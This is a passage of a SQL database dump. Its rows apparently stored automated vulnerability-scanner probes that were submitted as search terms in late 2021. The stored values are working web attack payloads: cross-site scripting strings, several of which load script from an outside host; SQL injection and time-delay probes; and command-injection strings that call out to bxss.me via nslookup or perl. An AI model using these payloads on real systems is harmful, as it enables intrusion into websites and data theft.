23:25:54'),(1335,'%74%68%65%3C%53%63%52%69%50%74%20%3E%6C%30%57%63%289427%29%3C%2F%73%43%72%69%70%54%3E',4,1,NULL,1,1,1,0,'2021-12-01 23:25:57'),(1337,'the\\u003CScRiPt\\l0Wc(9080)\\u003C/sCripT\\u003E',6,1,NULL,1,1,1,0,'2021-12-01 23:26:03'),(1339,'the&lt;ScRiPt&gt;l0Wc(9186)&lt;/sCripT&gt;',6,1,NULL,1,1,1,0,'2021-12-01 23:26:11'),(1341,'?<img acu onmouseover=l0Wc(9378) //?>',0,1,NULL,1,1,1,0,'2021-12-01 23:26:13'),(1343,'the<input autofocus onfocus=l0Wc(9880)>',6,1,NULL,1,1,1,0,'2021-12-01 23:26:16'),(1351,'the<img<!-- --> src=x onerror=alert(9167);//><!-- -->',6,1,NULL,1,1,1,0,'2021-12-01 23:26:51'),(1353,'the}body{acu:Expre/**/SSion(l0Wc(9017))}',2,1,NULL,1,1,1,0,'2021-12-01 23:26:55'),(1355,'the<% contenteditable onresize=l0Wc(9438)>',6,1,NULL,1,1,1,0,'2021-12-01 23:26:58'),(1357,'theVSSLs\n<ScRiPt >l0Wc(9907)</ScRiPt>',0,1,NULL,1,1,1,0,'2021-12-01 23:27:02'),(1359,'the<WDGCQ0>UOXAV[!+!]</WDGCQ0>',6,1,NULL,1,1,1,0,'2021-12-01 23:27:07'),(1361,'the<ifRAme sRc=9011.com></IfRamE>',14,1,NULL,1,1,1,0,'2021-12-01 23:27:15'),(1363,'the<Uo2jKQ x=9755>',6,1,NULL,1,1,1,0,'2021-12-01 23:27:22'),(1365,'the<img sRc=\'http://attacker-9554/log.php?',6,1,NULL,1,1,1,0,'2021-12-01 23:27:27'),(1367,'the<QoAFdo<',6,1,NULL,1,1,1,0,'2021-12-01 23:27:32'),(1369,'the9496\"();}]9299',0,1,NULL,1,1,1,0,'2021-12-01 23:27:49'),(1371,'%74%68%65%39%30%30%31%22%28%29%3B%7D%5D%39%31%38%39',0,1,NULL,1,1,1,0,'2021-12-01 23:27:52'),(1373,'the</script><script>l0Wc(9754)</script>',6,1,NULL,1,1,1,0,'2021-12-01 23:28:00'),(1381,'O38HUhKg',0,1,NULL,1,1,1,0,'2021-12-01 23:37:54'),(1383,'the\' AND 2*3*8=6*8 AND \'F0DG\'=\'F0DG',2,1,NULL,1,1,1,0,'2021-12-01 23:37:59'),(1385,'the\" AND 2*3*8=6*8 AND \"4xnJ\"=\"4xnJ',2,1,NULL,1,1,1,0,'2021-12-01 23:38:12'),(1387,'the%\' AND 2*3*8=6*8 AND \'TFSk\'!=\'TFSk%',2,1,NULL,1,1,1,0,'2021-12-01 23:38:17'),(1389,'-1 OR 2+450-450-1=0+0+0+1',1,1,NULL,1,1,1,0,'2021-12-01 23:38:24'),(1391,'-1 OR 3+450-450-1=0+0+0+1',1,1,NULL,1,1,1,0,'2021-12-01 23:38:26'),(1393,'the\' RLIKE (SELECT (CASE WHEN (564=564) THEN 1 ELSE 0x28 END)) --',1,1,NULL,1,1,1,0,'2021-12-01 23:38:29'),(1405,'*:*&fl=*,id:[value%20v=\'\\u0036\\u0036\\u003697233310\\u0039\\u0039\\u0039\'],name:[value%20v=\'\\u0036\\u0036\\u003697233310\\u0039\\u0039\\u',2,1,NULL,1,1,1,0,'2021-12-01 23:39:22'),(1409,'response.write(9444794*9087045)',0,1,NULL,1,1,1,0,'2021-12-01 23:39:29'),(1411,'aaa&shards=http://hitexbpauxtxj08f52.bxss.me/solr',1,1,NULL,1,1,1,0,'2021-12-01 23:39:33'),(1413,'883u3fAf\'; waitfor delay \'0:0:15\' --',0,1,NULL,1,1,1,0,'2021-12-01 23:39:34'),(1415,'echo fjeavo$()\\ rluwbw\\nz^xyu||a #\' &echo fjeavo$()\\ rluwbw\\nz^xyu||a #|\" &echo fjeavo$()\\ rluwbw\\nz^xyu||a #',0,1,NULL,1,1,1,0,'2021-12-01 23:39:36'),(1417,'&echo rovxpb$()\\ kkfxxq\\nz^xyu||a #\' &echo rovxpb$()\\ kkfxxq\\nz^xyu||a #|\" &echo rovxpb$()\\ kkfxxq\\nz^xyu||a #',0,1,NULL,1,1,1,0,'2021-12-01 23:39:41'),(1419,'DCl22p5R',0,1,NULL,1,1,1,0,'2021-12-01 23:39:48'),(1421,'WybIjJMS\' OR 136=(SELECT 136 FROM PG_SLEEP(15))--',0,1,NULL,1,1,1,0,'2021-12-01 23:39:48'),(1427,'xTKRNxEE\') OR 703=(SELECT 703 FROM PG_SLEEP(15))--',0,1,NULL,1,1,1,0,'2021-12-01 23:39:57'),(1429,'|echo smlwhp$()\\ hisjfn\\nz^xyu||a #\' |echo smlwhp$()\\ hisjfn\\nz^xyu||a #|\" |echo smlwhp$()\\ hisjfn\\nz^xyu||a #',0,1,NULL,1,1,1,0,'2021-12-01 23:39:58'),(1433,'(nslookup hitbfzpctepac1450c.bxss.me||perl -e \"gethostbyname(\'hitbfzpctepac1450c.bxss.me\')\")',2,1,NULL,1,1,1,0,'2021-12-01 23:40:10'),(1437,'\'+response.write(9444794*9087045)+\'',0,2,NULL,1,1,1,0,'2021-12-01 23:40:15'),(1441,'vz9AOhMv\')) OR 603=(SELECT 603 FROM PG_SLEEP(15))--',0,1,NULL,1,1,1,0,'2021-12-01 23:40:19'),(1445,'\"+response.write(9444794*9087045)+\"',0,1,NULL,1,1,1,0,'2021-12-01 23:40:21'),(1447,'muG1Zngc\')) OR 575=(SELECT 575 FROM PG_SLEEP(16))--',1,1,NULL,1,1,1,0,'2021-12-01 23:40:23'),(1451,'$(nslookup hitrruspcikvffc0f0.bxss.me||perl -e \"gethostbyname(\'hitrruspcikvffc0f0.bxss.me\')\")',2,1,NULL,1,1,1,0,'2021-12-01 23:40:25'),(1455,'${9999253+9999901}',0,1,NULL,1,1,1,0,'2021-12-01 23:40:28'),(1459,'&(nslookup hitmhreaasiww18809.bxss.me||perl -e \"gethostbyname(\'hitmhreaasiww18809.bxss.me\')\")&\'\\\"`0&(nslookup hitmhreaasiww18809',2,1,NULL,1,1,1,0,'2021-12-01 23:40:32'),(1467,'the&n912625=v974945',1,1,NULL,1,1,1,0,'2021-12-01 23:40:37'),(1469,'|(nslookup hitjkshxuqhpl3fb17.bxss.me||perl -e \"gethostbyname(\'hitjkshxuqhpl3fb17.bxss.me\')\")',2,1,NULL,1,1,1,0,'2021-12-01 23:40:37'),(1473,'`(nslookup hitwdxfclyhojd68a0.bxss.me||perl -e \"gethostbyname(\'hitwdxfclyhojd68a0.bxss.me\')\")`',2,1,NULL,1,1,1,0,'2021-12-01 23:40:40'),(1477,';(nslookup hitxrndpvfaev91cce.bxss.me||perl -e \"gethostbyname(\'hitxrndpvfaev91cce.bxss.me\')\")|(nslookup hitxrndpvfaev91cce.bxss.',2,1,NULL,1,1,1,0,'2021-12-01 23:40:43'),(1483,'\'.gethostbyname(lc(\'hitst\'.\'sqnsyfyee22d7.bxss.me.\')).\'A\'.chr(67).chr(hex(\'58\')).chr(102).chr(84).chr(110).chr(70).\'',2,1,NULL,1,1,1,0,'2021-12-01 23:40:47'),(1492,'@@LEwZa',0,1,NULL,1,1,1,0,'2021-12-01 23:40:53'),(1498,'\"+\"A\".concat(70-3).concat(22*4).concat(119).concat(80).concat(110).concat(83)+(require\"socket\"\nSocket.gethostbyname(\"hitvi\"+\"nyx',2,1,NULL,1,1,1,0,'2021-12-01 23:40:57'),(1502,'\".gethostbyname(lc(\"hitsi\".\"zeyvzuzu1b039.bxss.me.\")).\"A\".chr(67).chr(hex(\"58\")).chr(112).chr(80).chr(100).chr(86).\"',2,1,NULL,1,1,1,0,'2021-12-01 23:40:58'),(1506,'\'+\'A\'.concat(70-3).concat(22*4).concat(110).concat(67).concat(100).concat(74)+(require\'socket\'\nSocket.gethostbyname(\'hitav\'+\'vbk',2,1,NULL,1,1,1,0,'2021-12-01 23:41:02'),(1517,'952024',0,1,NULL,1,1,1,0,'2021-12-01 23:41:10'),(1531,'the\'\"()&%<acx><ScRiPt >Fnnj(9879)</ScRiPt>',1,1,NULL,1,1,1,0,'2021-12-01 23:41:24'),(1541,'\'\"()&%<acx><ScRiPt >Fnnj(9293)</ScRiPt>',0,1,NULL,1,1,1,0,'2021-12-01 23:41:30'),(1543,'the9893423',0,1,NULL,1,1,1,0,'2021-12-01 23:41:36'),(1547,'the9893423<',0,1,NULL,1,1,1,0,'2021-12-01 23:41:49'),(1549,'acu9649＜s1﹥s2ʺs3ʹuca9649',0,1,NULL,1,1,1,0,'2021-12-01 23:41:57'),(1551,'acux6727??z1??z2a?bcxuca6727',0,1,NULL,1,1,1,0,'2021-12-01 23:42:01'),(1553,'{{49563*49955}}',0,1,NULL,1,1,1,0,'2021-12-01 23:42:08'),(1555,'acu9943＜s1﹥s2ʺs3ʹuca9943',0,1,NULL,1,1,1,0,'2021-12-01 23:42:13'),(1557,'acux5205??z1??z2a?bcxuca5205',0,1,NULL,1,1,1,0,'2021-12-01 23:42:16'),(1559,'{{50003*49744}}',0,1,NULL,1,1,1,0,'2021-12-01 23:42:35'),(1561,'acu4791＜s1﹥s2ʺs3ʹuca4791',0,1,NULL,1,1,1,0,'2021-12-01 23:42:51'),(1563,'acux3969??z1??z2a?bcxuca3969',0,1,NULL,1,1,1,0,'2021-12-01 23:42:56'),(1565,'{{49805*49763}}',0,1,NULL,1,1,1,0,'2021-12-01 23:43:00'),(1567,'acu1140＜s1﹥s2ʺs3ʹuca1140',0,1,NULL,1,1,1,0,'2021-12-01 23:43:07'),(1569,'acux10203??z1??z2a?bcxuca10203',0,1,NULL,1,1,1,0,'2021-12-01 23:43:10'),(1571,'{{49183*50169}}',0,1,NULL,1,1,1,0,'2021-12-01 23:43:12'),(1573,'acu10257＜s1﹥s2ʺs3ʹuca10257',0,1,NULL,1,1,1,0,'2021-12-01 23:43:16'),(1575,'acux5240??z1??z2a?bcxuca5240',0,1,NULL,1,1,1,0,'2021-12-01 23:43:28'),(1577,'{{50198*50140}}',0,1,NULL,1,1,1,0,'2021-12-01 23:43:30'),(1579,'acu3568＜s1﹥s2ʺs3ʹuca3568',0,1,NULL,1,1,1,0,'2021-12-01 23:43:43'),(1581,'acux3730??z1??z2a?bcxuca3730',0,1,NULL,1,1,1,0,'2021-12-01 23:44:02'),(1583,'{{49957*49514}}',0,1,NULL,1,1,1,0,'2021-12-01 23:44:10'),(1585,'acu1217＜s1﹥s2ʺs3ʹuca1217',0,1,NULL,1,1,1,0,'2021-12-01 23:44:15'),(1587,'acux8452??z1??z2a?bcxuca8452',0,1,NULL,1,1,1,0,'2021-12-01 23:44:20'),(1589,'{{49584*49977}}',0,1,NULL,1,1,1,0,'2021-12-01 23:44:24'),(1591,'acu2779＜s1﹥s2ʺs3ʹuca2779',0,1,NULL,1,1,1,0,'2021-12-01 23:44:29'),(1593,'acux3145??z1??z2a?bcxuca3145',0,1,NULL,1,1,1,0,'2021-12-01 23:44:32'),(1595,'{{49253*50078}}',0,1,NULL,1,1,1,0,'2021-12-01 23:44:43'),(1597,'the\"onmouseover=Fnnj(9377)\"',1,1,NULL,1,1,1,0,'2021-12-01 23:44:49'),(1599,'the\" 6xYD=Fnnj([!+!]) 2Rb=\"',1,1,NULL,1,1,1,0,'2021-12-01 23:44:57'),(1601,'the\\u0022onmouseover=Fnnj(9383)\\u0022',1,1,NULL,1,1,1,0,'2021-12-01 23:45:11'),(1603,'%74%68%65%22%6F%6E%6D%6F%75%73%65%6F%76%65%72%3D%46%6E%6E%6A%28%39%37%31%30%29%22',0,1,NULL,1,1,1,0,'2021-12-01 23:45:19'),(1605,'?\"onmouseover=Fnnj(9981)//',0,1,NULL,1,1,1,0,'2021-12-01 23:45:32'),(1607,'the\"sTYLe=\'acu:Expre/**/SSion(Fnnj(9462))\'bad=\"',1,1,NULL,1,1,1,0,'2021-12-01 23:45:40'),(1609,'the\"><script>Fnnj(9440)</script>',1,1,NULL,1,1,1,0,'2021-12-01 23:45:42'),(1611,'the</title><ScRiPt >Fnnj(9551)</ScRiPt>',1,1,NULL,1,1,1,0,'2021-12-01 23:45:51'),(1613,'the<ScRiPt >Fnnj(9675)</ScRiPt>',1,1,NULL,1,1,1,0,'2021-12-01 23:45:55'),(1615,'the<W77OYK>QIO6V[!+!]</W77OYK>',1,1,NULL,1,1,1,0,'2021-12-01 23:46:05'),(1617,'the<script>Fnnj(9845)</script>',1,1,NULL,1,1,1,0,'2021-12-01 23:46:12'),(1619,'the<ScR<ScRiPt>IpT>Fnnj(9415)</sCr<ScRiPt>IpT>',2,1,NULL,1,1,1,0,'2021-12-01 23:46:17'),(1621,'the<ScRiPt \r\n>Fnnj(9448)</ScRiPt>',1,1,NULL,1,1,1,0,'2021-12-01 23:46:28'),(1623,'the<ScRiPt/acu src=//xss.bxss.me/t/xss.js?9784></ScRiPt>',2,1,NULL,1,1,1,0,'2021-12-01 23:46:33'),(1625,'the<\0ScRiPt \r\n>Fnnj(9036)</ScRiPt>',1,1,NULL,1,1,1,0,'2021-12-01 23:46:41'),(1627,'the<video><source onerror=\"javascript:Fnnj(9046)\">',1,1,NULL,1,1,1,0,'2021-12-01 23:46:44'),(1629,'the<svg	\n\r?\0onload=Fnnj(9875);>',1,1,NULL,1,1,1,0,'2021-12-01 23:46:48'),(1631,'the<isindex type=image src=1 onerror=Fnnj(9644)>',2,1,NULL,1,1,1,0,'2021-12-01 23:46:50'),(1633,'the<iframe src=\'data:text/html;base64,PHNjcmlwdD5hbGVydCgnYWN1bmV0aXgteHNzLXRlc3QnKTwvc2NyaXB0Pgo=\' invalid=\'9385\'>',1,1,NULL,1,1,1,0,'2021-12-01 23:46:57'),(1635,'the<body onload=Fnnj(9463)>',1,1,NULL,1,1,1,0,'2021-12-01 23:47:00'),(1637,'the<img src=//xss.bxss.me/t/dot.gif onload=Fnnj(9551)>',2,1,NULL,1,1,1,0,'2021-12-01 23:47:03'),(1639,'the<img src=xyz OnErRor=Fnnj(9604)>',1,1,NULL,1,1,1,0,'2021-12-01 23:47:08'),(1641,'the<img/src=\">\" onerror=alert(9927)>',1,1,NULL,1,1,1,0,'2021-12-01 23:47:11'),(1643,'%74%68%65%3C%53%63%52%69%50%74%20%3E%46%6E%6E%6A%289330%29%3C%2F%73%43%72%69%70%54%3E',0,1,NULL,1,1,1,0,'2021-12-01 23:47:12'),(1645,'the\\u003CScRiPt\\Fnnj(9766)\\u003C/sCripT\\u003E',1,1,NULL,1,1,1,0,'2021-12-01 23:47:32'),(1647,'the&lt;ScRiPt&gt;Fnnj(9651)&lt;/sCripT&gt;',1,1,NULL,1,1,1,0,'2021-12-01 23:47:35'),(1649,'?<img acu onmouseover=Fnnj(9452) //?>',0,1,NULL,1,1,1,0,'2021-12-01 23:47:37'),(1651,'the<input autofocus onfocus=Fnnj(9308)>',1,1,NULL,1,1,1,0,'2021-12-01 23:47:47'),(1659,'the<img<!-- --> src=x onerror=alert(9582);//><!-- -->',1,1,NULL,1,1,1,0,'2021-12-01 23:48:07'),(1661,'the}body{acu:Expre/**/SSion(Fnnj(9093))}',0,1,NULL,1,1,1,0,'2021-12-01 23:48:15'),(1663,'the<% contenteditable onresize=Fnnj(9848)>',1,1,NULL,1,1,1,0,'2021-12-01 23:48:20'),(1665,'theb0zVP\n<ScRiPt >Fnnj(9676)</ScRiPt>',0,1,NULL,1,1,1,0,'2021-12-01 23:48:24'),(1667,'the<WHKNL7>T2AZ1[!+!]</WHKNL7>',1,1,NULL,1,1,1,0,'2021-12-01 23:48:28'),(1669,'the<ifRAme sRc=9383.com></IfRamE>',2,1,NULL,1,1,1,0,'2021-12-01 23:48:33'),(1671,'the<bGfXkA x=9720>',1,1,NULL,1,1,1,0,'2021-12-01 23:48:38'),(1673,'the<img sRc=\'http://attacker-9025/log.php?',1,1,NULL,1,1,1,0,'2021-12-01 23:48:46'),(1675,'the<RoMObE<',1,1,NULL,1,1,1,0,'2021-12-01 23:48:51'),(1677,'the9532\"();}]9162',0,1,NULL,1,1,1,0,'2021-12-01 23:48:53'),(1679,'%74%68%65%39%39%35%32%22%28%29%3B%7D%5D%39%30%33%37',0,1,NULL,1,1,1,0,'2021-12-01 23:48:57'),(1681,'the</script><script>Fnnj(9189)</script>',1,1,NULL,1,1,1,0,'2021-12-01 23:49:02'),(1684,'LXmyeZWQ',0,1,NULL,1,1,1,0,'2021-12-01 23:57:11'),(1686,'the\' AND 2*3*8=6*8 AND \'X39X\'=\'X39X',24,1,NULL,1,1,1,0,'2021-12-01 23:57:17'),(1688,'the\" AND 2*3*8=6*8 AND \"LNpT\"=\"LNpT',24,1,NULL,1,1,1,0,'2021-12-01 23:57:23'),(1690,'the%\' AND 2*3*8=6*8 AND \'u8bd\'!=\'u8bd%',24,1,NULL,1,1,1,0,'2021-12-01 23:57:26'),(1692,'-1 OR 2+515-515-1=0+0+0+1',19,1,NULL,1,1,1,0,'2021-12-01 23:57:31'),(1694,'-1 OR 3+515-515-1=0+0+0+1',14,1,NULL,1,1,1,0,'2021-12-01 23:57:35'),(1696,'-1 OR 3*2<(0+5+515-515)',21,1,NULL,1,1,1,0,'2021-12-01 23:57:39'),(1698,'-1 OR 3*2>(0+5+515-515)',21,1,NULL,1,1,1,0,'2021-12-01 23:57:43'),(1700,'the\' RLIKE (SELECT (CASE WHEN (559=559) THEN 1 ELSE 0x28 END)) --',17,1,NULL,1,1,1,0,'2021-12-01 23:57:50'),(1711,'XJEn7Xk1\'; waitfor delay \'0:0:15\' --',0,1,NULL,1,1,1,0,'2021-12-01 23:58:33'),(1713,'*:*&fl=*,id:[value%20v=\'\\u0036\\u0036\\u003691069771\\u0039\\u0039\\u0039\'],name:[value%20v=\'\\u0036\\u0036\\u003691069771\\u0039\\u0039\\u',23,1,NULL,1,1,1,0,'2021-12-01 23:58:40'),(1715,'fN4UbCjp\' OR 193=(SELECT 193 FROM PG_SLEEP(15))--',0,1,NULL,1,1,1,0,'2021-12-01 23:58:43'),(1718,'dVhpsMLj\') OR 789=(SELECT 789 FROM PG_SLEEP(15))--',0,1,NULL,1,1,1,0,'2021-12-01 23:58:48'),(1721,'aaa&shards=http://hitakvvdltgue4b415.bxss.me/solr',16,1,NULL,1,1,1,0,'2021-12-01 23:58:54'),(1723,'2q2VXMhc\')) OR 818=(SELECT 818 FROM PG_SLEEP(15))--',0,1,NULL,1,1,1,0,'2021-12-01 23:58:54'),(1727,'response.write(9575707*9779604)',0,1,NULL,1,1,1,0,'2021-12-01 23:59:03'),(1731,'\'+response.write(9575707*9779604)+\'',0,1,NULL,1,1,1,0,'2021-12-01 23:59:08'),(1733,'@@YYPpU',0,1,NULL,1,1,1,0,'2021-12-01 23:59:09'),(1735,'echo mlafpk$()\\ kvxmie\\nz^xyu||a #\' &echo mlafpk$()\\ kvxmie\\nz^xyu||a #|\" &echo mlafpk$()\\ kvxmie\\nz^xyu||a #',0,1,NULL,1,1,1,0,'2021-12-01 23:59:12'),(1737,'MlXU0SMo',0,1,NULL,1,1,1,0,'2021-12-01 23:59:13'),(1739,'&echo dlgncc$()\\ ltaqof\\nz^xyu||a #\' &echo dlgncc$()\\ ltaqof\\nz^xyu||a #|\" &echo dlgncc$()\\ ltaqof\\nz^xyu||a #',0,1,NULL,1,1,1,0,'2021-12-01 23:59:16'),(1741,'|echo zeyxyl$()\\ zcshdp\\nz^xyu||a #\' |echo zeyxyl$()\\ zcshdp\\nz^xyu||a #|\" |echo zeyxyl$()\\ zcshdp\\nz^xyu||a #',0,1,NULL,1,1,1,0,'2021-12-01 23:59:18'),(1743,'(nslookup hittktimxuuml81b04.bxss.me||perl -e \"gethostbyname(\'hittktimxuuml81b04.bxss.me\')\")',24,1,NULL,1,1,1,0,'2021-12-01 23:59:22'),(1745,'$(nslookup hitozdhjzzoun1a988.bxss.me||perl -e \"gethostbyname(\'hitozdhjzzoun1a988.bxss.me\')\")',24,1,NULL,1,1,1,0,'2021-12-01 23:59:25'),(1747,'\"+response.write(9575707*9779604)+\"',0,1,NULL,1,1,1,0,'2021-12-01 23:59:25'),(1753,'&(nslookup hitilivrdhnsjb0fd6.bxss.me||perl -e \"gethostbyname(\'hitilivrdhnsjb0fd6.bxss.me\')\")&\'\\\"`0&(nslookup hitilivrdhnsjb0fd6',24,1,NULL,1,1,1,0,'2021-12-01 23:59:34'),(1755,'|(nslookup hitwjfexryyosabf3e.bxss.me||perl -e \"gethostbyname(\'hitwjfexryyosabf3e.bxss.me\')\")',24,1,NULL,1,1,1,0,'2021-12-01 23:59:38'),(1759,'`(nslookup hitfrkptvyboqd8178.bxss.me||perl -e \"gethostbyname(\'hitfrkptvyboqd8178.bxss.me\')\")`',24,1,NULL,1,1,1,0,'2021-12-01 23:59:44'),(1761,';(nslookup hitudpcdgautn1c575.bxss.me||perl -e \"gethostbyname(\'hitudpcdgautn1c575.bxss.me\')\")|(nslookup hitudpcdgautn1c575.bxss.',24,1,NULL,1,1,1,0,'2021-12-01 23:59:46'),(1765,'${10000058+9999817}',0,1,NULL,1,1,1,0,'2021-12-01 23:59:49'),(1769,'the&n914145=v965079',9,1,NULL,1,1,1,0,'2021-12-01 23:59:56'),(1773,'\'.gethostbyname(lc(\'hitzx\'.\'dvebihgn993cb.bxss.me.\')).\'A\'.chr(67).chr(hex(\'58\')).chr(113).chr(75).chr(113).chr(74).\'',24,1,NULL,1,1,1,0,'2021-12-02 00:00:12'),(1782,'\".gethostbyname(lc(\"hityn\".\"ojcazzto9f14c.bxss.me.\")).\"A\".chr(67).chr(hex(\"58\")).chr(120).chr(73).chr(104).chr(65).\"',24,1,NULL,1,1,1,0,'2021-12-02 00:00:23'),(1785,'\"+\"A\".concat(70-3).concat(22*4).concat(116).concat(83).concat(103).concat(80)+(require\"socket\"\nSocket.gethostbyname(\"hityl\"+\"mju',24,1,NULL,1,1,1,0,'2021-12-02 00:00:29'),(1790,'\'+\'A\'.concat(70-3).concat(22*4).concat(106).concat(74).concat(109).concat(73)+(require\'socket\'\nSocket.gethostbyname(\'hitjl\'+\'pdk',24,1,NULL,1,1,1,0,'2021-12-02 00:00:33'),(1802,'the\'\"()&%<acx><ScRiPt >cgnS(9850)</ScRiPt>',9,1,NULL,1,1,1,0,'2021-12-02 00:00:43'),(1804,'956090',0,1,NULL,1,1,1,0,'2021-12-02 00:00:44'),(1809,'\'\"()&%<acx><ScRiPt >cgnS(9547)</ScRiPt>',0,1,NULL,1,1,1,0,'2021-12-02 00:00:49'),(1815,'the9447510',0,1,NULL,1,1,1,0,'2021-12-02 00:00:53'),(1819,'the9447510<',0,1,NULL,1,1,1,0,'2021-12-02 00:00:57'),(1827,'acu3352＜s1﹥s2ʺs3ʹuca3352',0,1,NULL,1,1,1,0,'2021-12-02 00:01:12'),(1831,'acux5328??z1??z2a?bcxuca5328',0,1,NULL,1,1,1,0,'2021-12-02 00:01:16'),(1833,'{{49056*50340}}',0,1,NULL,1,1,1,0,'2021-12-02 00:01:20'),(1836,'acu8236＜s1﹥s2ʺs3ʹuca8236',0,2,NULL,1,1,1,0,'2021-12-02 00:01:57'),(1840,'acux5269??z1??z2a?bcxuca5269',0,1,NULL,1,1,1,0,'2021-12-02 00:02:01'),(1842,'{{50415*50266}}',0,1,NULL,1,1,1,0,'2021-12-02 00:02:05'),(1844,'acu5380＜s1﹥s2ʺs3ʹuca5380',0,1,NULL,1,1,1,0,'2021-12-02 00:02:10'),(1846,'acux10144??z1??z2a?bcxuca10144',0,1,NULL,1,1,1,0,'2021-12-02 00:02:18'),(1848,'{{49798*49527}}',0,1,NULL,1,1,1,0,'2021-12-02 00:02:26'),(1850,'acu5373＜s1﹥s2ʺs3ʹuca5373',0,1,NULL,1,1,1,0,'2021-12-02 00:02:28'),(1852,'acux3999??z1??z2a?bcxuca3999',0,1,NULL,1,1,1,0,'2021-12-02 00:02:36'),(1854,'{{49705*49105}}',0,1,NULL,1,1,1,0,'2021-12-02 00:02:52'),(1856,'acu9113＜s1﹥s2ʺs3ʹuca9113',0,1,NULL,1,1,1,0,'2021-12-02 00:02:55'),(1858,'acux10486??z1??z2a?bcxuca10486',0,1,NULL,1,1,1,0,'2021-12-02 00:02:58'),(1860,'{{49306*49374}}',0,1,NULL,1,1,1,0,'2021-12-02 00:03:08'),(1862,'acu8046＜s1﹥s2ʺs3ʹuca8046',0,1,NULL,1,1,1,0,'2021-12-02 00:03:25'),(1864,'acux9514??z1??z2a?bcxuca9514',0,1,NULL,1,1,1,0,'2021-12-02 00:03:28'),(1866,'{{49037*50097}}',0,1,NULL,1,1,1,0,'2021-12-02 00:03:32'),(1868,'acu6653＜s1﹥s2ʺs3ʹuca6653',0,1,NULL,1,1,1,0,'2021-12-02 00:03:42'),(1870,'acux10595??z1??z2a?bcxuca10595',0,1,NULL,1,1,1,0,'2021-12-02 00:03:44'),(1872,'{{50233*50240}}',0,1,NULL,1,1,1,0,'2021-12-02 00:03:49'),(1874,'the\"onmouseover=cgnS(9760)\"',9,1,NULL,1,1,1,0,'2021-12-02 00:03:59'),(1876,'the\" s978=cgnS([!+!]) Og7=\"',9,1,NULL,1,1,1,0,'2021-12-02 00:04:02'),(1878,'the\\u0022onmouseover=cgnS(9459)\\u0022',9,1,NULL,1,1,1,0,'2021-12-02 00:04:17'),(1880,'%74%68%65%22%6F%6E%6D%6F%75%73%65%6F%76%65%72%3D%63%67%6E%53%28%39%36%37%35%29%22',1,1,NULL,1,1,1,0,'2021-12-02 00:04:21'),(1882,'?\"onmouseover=cgnS(9711)//',0,1,NULL,1,1,1,0,'2021-12-02 00:04:24'),(1884,'the\"sTYLe=\'acu:Expre/**/SSion(cgnS(9145))\'bad=\"',10,1,NULL,1,1,1,0,'2021-12-02 00:04:28'),(1886,'the\"><script>cgnS(9751)</script>',9,1,NULL,1,1,1,0,'2021-12-02 00:04:40'),(1888,'the</title><ScRiPt >cgnS(9317)</ScRiPt>',9,1,NULL,1,1,1,0,'2021-12-02 00:04:44'),(1890,'the<ScRiPt >cgnS(9012)</ScRiPt>',9,1,NULL,1,1,1,0,'2021-12-02 00:04:48'),(1892,'the<WLQUWF>8ER4X[!+!]</WLQUWF>',9,1,NULL,1,1,1,0,'2021-12-02 00:04:52'),(1894,'the<script>cgnS(9956)</script>',9,1,NULL,1,1,1,0,'2021-12-02 00:04:55'),(1896,'the<ScR<ScRiPt>IpT>cgnS(9558)</sCr<ScRiPt>IpT>',12,1,NULL,1,1,1,0,'2021-12-02 00:04:57'),(1898,'the<ScRiPt \r\n>cgnS(9003)</ScRiPt>',9,1,NULL,1,1,1,0,'2021-12-02 00:05:00'),(1900,'the<ScRiPt/acu src=//xss.bxss.me/t/xss.js?9744></ScRiPt>',24,1,NULL,1,1,1,0,'2021-12-02 00:05:05'),(1902,'the<\0ScRiPt \r\n>cgnS(9452)</ScRiPt>',9,1,NULL,1,1,1,0,'2021-12-02 00:05:13'),(1904,'the<video><source onerror=\"javascript:cgnS(9998)\">',9,1,NULL,1,1,1,0,'2021-12-02 00:05:19'),(1906,'the<svg	\n\r?\0onload=cgnS(9986);>',9,1,NULL,1,1,1,0,'2021-12-02 00:05:25'),(1908,'the<isindex type=image src=1 onerror=cgnS(9526)>',19,1,NULL,1,1,1,0,'2021-12-02 00:05:31'),(1910,'the<iframe src=\'data:text/html;base64,PHNjcmlwdD5hbGVydCgnYWN1bmV0aXgteHNzLXRlc3QnKTwvc2NyaXB0Pgo=\' invalid=\'9008\'>',9,1,NULL,1,1,1,0,'2021-12-02 00:05:38'),(1912,'the<body onload=cgnS(9376)>',10,1,NULL,1,1,1,0,'2021-12-02 00:05:43'),(1914,'the<img src=//xss.bxss.me/t/dot.gif onload=cgnS(9064)>',24,1,NULL,1,1,1,0,'2021-12-02 00:05:46'),(1916,'the<img src=xyz OnErRor=cgnS(9259)>',9,1,NULL,1,1,1,0,'2021-12-02 00:05:57'),(1918,'the<img/src=\">\" onerror=alert(9879)>',9,1,NULL,1,1,1,0,'2021-12-02 00:05:59'),(1920,'%74%68%65%3C%53%63%52%69%50%74%20%3E%63%67%6E%53%289287%29%3C%2F%73%43%72%69%70%54%3E',7,1,NULL,1,1,1,0,'2021-12-02 00:06:02'),(1922,'the\\u003CScRiPt\\cgnS(9141)\\u003C/sCripT\\u003E',9,1,NULL,1,1,1,0,'2021-12-02 00:06:05'),(1924,'the&lt;ScRiPt&gt;cgnS(9645)&lt;/sCripT&gt;',9,1,NULL,1,1,1,0,'2021-12-02 00:06:08'),(1926,'?<img acu onmouseover=cgnS(9459) //?>',0,1,NULL,1,1,1,0,'2021-12-02 00:06:17'),(1928,'the<input autofocus onfocus=cgnS(9406)>',9,1,NULL,1,1,1,0,'2021-12-02 00:06:24'),(1933,'the<img<!-- --> src=x onerror=alert(9664);//><!-- -->',9,1,NULL,1,1,1,0,'2021-12-02 00:06:38'),(1935,'the}body{acu:Expre/**/SSion(cgnS(9681))}',2,1,NULL,1,1,1,0,'2021-12-02 00:06:40'),(1937,'the<% contenteditable onresize=cgnS(9504)>',9,1,NULL,1,1,1,0,'2021-12-02 00:06:45'),(1939,'the4jwOH\n<ScRiPt >cgnS(9123)</ScRiPt>',0,1,NULL,1,1,1,0,'2021-12-02 00:06:47'),(1941,'the<WMVURO>UYHIA[!+!]</WMVURO>',9,1,NULL,1,1,1,0,'2021-12-02 00:06:50'),(1943,'the<ifRAme sRc=9897.com></IfRamE>',19,1,NULL,1,1,1,0,'2021-12-02 00:06:55'),(1945,'the<yHO0o6 x=9332>',9,1,NULL,1,1,1,0,'2021-12-02 00:06:59'),(1947,'the<img sRc=\'http://attacker-9397/log.php?',9,1,NULL,1,1,1,0,'2021-12-02 00:07:12'),(1949,'the<OItP8n<',9,1,NULL,1,1,1,0,'2021-12-02 